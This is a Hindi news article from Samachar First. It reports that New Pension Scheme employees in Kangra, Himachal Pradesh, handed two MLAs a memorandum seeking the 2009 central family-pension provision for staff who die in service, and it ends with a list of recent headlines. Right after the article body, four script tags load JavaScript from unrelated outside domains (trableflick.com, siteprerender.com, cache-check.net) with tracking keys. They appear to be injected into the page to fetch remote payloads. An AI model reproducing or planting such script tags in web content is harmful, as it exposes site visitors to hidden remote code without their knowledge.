Categories: हिमाचल

नई पेंशन स्कीम कर्मचारियों ने विधायकों से रखी केंद्र लाभ की मांग

<p>नई पेंशन स्कीम कर्मचारियों ने धर्मशाला विधायक विशाल नैहरिया और बैजनाथ विधायक मुल्ख राज प्रेमी से नई पेंशन स्कीम के कर्मचारियों को बेह लाभ प्रदेश सरकार से जारी करवाने की मांग रखी है। जो लाभ केंद्र सरकार अपने नई पेंशन स्कीम कर्मचारियों को 2009 से प्रदान कर रहा है। नई पेंशन स्कीम कर्मचारी एसोसिएशन के कांगड़ा जिला प्रधान राजिंदर मन्हास और महासचिव अनीश धीमान ने बताया कि इस सिलसिले में दोनों विधायकों को ज्ञापन एसोसिएशन के माध्यम से सौंपा गया। जिला प्रधान ने बताया कि केंद्र की 5 मई 2009 की अधिसूचना के तहत सेवा के दौरान नई पेंशन स्कीम के कर्मचारी की मौत पर परिवार को पेंशन का प्रावधान है।</p>

<p>यह अधिसूचना कई राज्य अपने प्रदेश में लागू कर चुके है परन्तु पिछले दो साल से कर्मचारियों की इस मांग को प्रदेश सरकार नजरअंदाज कर रही है। ऐसे में कई कर्मचारियों ने अपने प्राण खोए हैं और आज उन परिवारों की हालत दयनीय है क्योंकि कर्मचारी का एनपीएस का पैसा भी 20% ही परिवार को दिया गया और 80% राशि का जबरदस्ती पेंशन प्लान उस परिवार को खरीदने के&nbsp; लिए मजबूर किया गया। जिससे एक हजार या दो हजार उस पैसे का व्याज कर्मचारी के परिवार को मिल रहा है। जिससे कर्मचारी के परिवार का गुजारा मुमकिन नहीं है।</p>

<p>जिला प्रधान ने बताया कि पिछले एक माह में एसोसिएशन ने कांगड़ा में ही अपने&nbsp; ऐसे 6 दिवंगत कर्मचारियों के लिए 8.5 लाख की राशि एकत्रित कर परिवारों को दी है। जिला प्रधान ने बताया कि इसी मांग के लिए अब एसोसिएशन हिमाचल के सभी विधायकों से मिल रही है कि कम से कम&nbsp; कर्मचारी की मौत पर पेंशन परिवार को प्रदान की जाए।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1592452026960″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

10 mins ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

57 mins ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

1 hour ago

मस्जिद विवाद के बीच विक्रमादित्य की वक्फ बोर्ड में सुधार की नस‍ीहत

Shimla:हिमाचल और हिमाचलियत के हित सर्वश्रेष्ठ, सर्वत्र हिमाचल का संपूर्ण विकास। समय के साथ हर…

2 hours ago

कंगना का मंडी प्रेम: ‘यह मेरा घर है, यहां काम करूंगी

Manali: मशहूर अभिनेत्री कंगना रनौत ने  मनाली की यात्रा के दौरान अपने गृहनगर और लोगों…

2 hours ago

Survey: लेनदेन शुल्क लगा तो UPIका इस्तेमाल बंद कर देगे 75% उपयोगकर्ता

  New Delhi:लोकलसर्किल्स ने रविवार को एक सर्वेक्षण निष्कर्ष निकाला है। जिसमें दावा किया गया…

6 hours ago